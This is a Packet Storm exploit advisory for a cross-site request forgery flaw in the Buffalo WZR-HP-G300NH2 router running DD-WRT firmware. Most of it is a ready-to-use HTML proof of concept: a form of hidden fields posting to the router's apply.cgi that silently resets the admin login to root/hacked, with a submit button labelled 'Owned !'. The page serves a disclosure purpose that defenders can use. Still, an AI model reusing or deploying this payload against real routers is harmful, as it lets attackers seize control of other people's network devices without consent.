exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Buffalo WZR-HP-G300NH2 Cross Site Request Forgery

Buffalo WZR-HP-G300NH2 Cross Site Request Forgery
Posted Jun 10, 2013
Authored by Prayas Kulshrestha

Buffalo WZR-HP-G300NH2 suffers from a cross site request forgery vulnerability. The demonstration payload changes the administrative password.

tags | exploit, csrf
SHA-256 | 356ff09e4efca2670f2e2f1a9ece0406305b5341ab44dff0237f4cf86e2c9419

Buffalo WZR-HP-G300NH2 Cross Site Request Forgery

Change Mirror Download
######################################################################
# Exploit Title: Buffalo WZR-HP-G300NH2 CSRF Vulnerability
# Author: Prayas Kulshrestha
# E-mail: officialnlsprayas@gmail.com
# Category: Hardware
# Google Dork: N/A
# Date: 06/10/2013
# Vendor: http://www.buffalotech.com
# Model: WZR-HP-G300NH2
# Firmware Version: DD-WRT v24SP2-MULTI (10/31/11) std - build 17798
# Product: http://www.buffalo-asia.com/hongkong/products/product_details.php?id=466&name=WZR-HP-G300NH2
# Tested on: Windows 7 (ultimate) 64-bit
######################################################################

#Introduction
==============
WZR-HP-G300NH2 is a high speed wireless LAN solution and complies with standard IEEE 802.11n 300 Mbps as well as High Power feature.
Wired LAN also supports the Gigabit Ethernet that no matter in the wired or wireless transmission,
WZR-HP-G300NH2 brings the high quality video era and realizes the comfortable wireless network environment.
Wireless Security Supports WPA2-PSK (AES, TKIP), WPA-PSK (AES, TKIP), 128/64-bit WEP and sets the wireless security of each level respectively.
USB2.0 port may be connected to Buffalo's USB external hard drive for network storage after simple setting.

#Description of Vulnerability
=============================
There is a CSRF vulnerability in the Buffalo WZR-HP-G300NH2 and any one easily change or manipulate the admin username and password. This is will POST request and any one can craft malicious html form with specially crafted POST request
to the router and on execution of the form the router's user name and password can be changed to anything.

#Exploit
========

<html>
<!-- Exploit Code by Prayas Kulshrestha -->
<body>
<h1>This is the PoC for the CSRF vulnerability in the buffalo router Powered by DD-WRT v24SP2-MULTI (10/31/11) std (SVN revision 17798)</h1>
<h2>click below to see the magic<h2>

<form action="http://192.168.1.1/apply.cgi" method="POST">
<input type="hidden" name="submit_button" value="Management" />
<input type="hidden" name="action" value="ApplyTake" />
<input type="hidden" name="change_action" value="" />
<input type="hidden" name="submit_type" value="" />
<input type="hidden" name="commit" value="1" />
<input type="hidden" name="PasswdModify" value="0" />
<input type="hidden" name="remote_mgt_https" value="0" />
<input type="hidden" name="http_enable" value="1" />
<input type="hidden" name="info_passwd" value="0" />
<input type="hidden" name="https_enable" value="0" />
<input type="hidden" name="http_username" value="root" />
<input type="hidden" name="http_passwd" value="hacked" />
<input type="hidden" name="http_passwdConfirm" value="hacked" />
<input type="hidden" name="_http_enable" value="1" />
<input type="hidden" name="refresh_time" value="3" />
<input type="hidden" name="status_auth" value="1" />
<input type="hidden" name="maskmac" value="1" />
<input type="hidden" name="remote_management" value="0" />
<input type="hidden" name="remote_mgt_ssh" value="0" />
<input type="hidden" name="remote_mgt_telnet" value="0" />
<input type="hidden" name="remote_ip_any" value="1" />
<input type="hidden" name="remote_ip" value="4" />
<input type="hidden" name="remote_ip_0" value="0" />
<input type="hidden" name="remote_ip_1" value="0" />
<input type="hidden" name="remote_ip_2" value="0" />
<input type="hidden" name="remote_ip_3" value="0" />
<input type="hidden" name="remote_ip_4" value="0" />
<input type="hidden" name="boot_wait" value="on" />
<input type="hidden" name="cron_enable" value="1" />
<input type="hidden" name="cron_jobs" value="" />
<input type="hidden" name="nas_enable" value="1" />
<input type="hidden" name="resetbutton_enable" value="1" />
<input type="hidden" name="zebra_enable" value="1" />
<input type="hidden" name="ipv6_enable0" value="0" />
<input type="hidden" name="radvd_enable" value="0" />
<input type="hidden" name="radvd_conf" value="" />
<input type="hidden" name="enable_jffs2" value="0" />
<input type="hidden" name="clean_jffs2" value="0" />
<input type="hidden" name="language" value="english" />
<input type="hidden" name="tcp_congestion_control" value="vegas" />
<input type="hidden" name="ip_conntrack_max" value="4096" />
<input type="hidden" name="ip_conntrack_tcp_timeouts" value="3600" />
<input type="hidden" name="ip_conntrack_udp_timeouts" value="120" />
<input type="hidden" name="samba_mount" value="0" />
<input type="hidden" name="samba_share" value="//yourserverip/yourshare" />
<input type="hidden" name="samba_user" value="username/computer" />
<input type="hidden" name="samba_password" value="iwer573495u7340" />
<input type="hidden" name="samba_script" value="yourscript" />
<input type="submit" value="Owned !" />
</form>
</body>
</html>


==========
Save this as anything.htm and this will change the router's user name and password.
username:root
password:hacked

#Greetz to : All Indian Hackers.
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close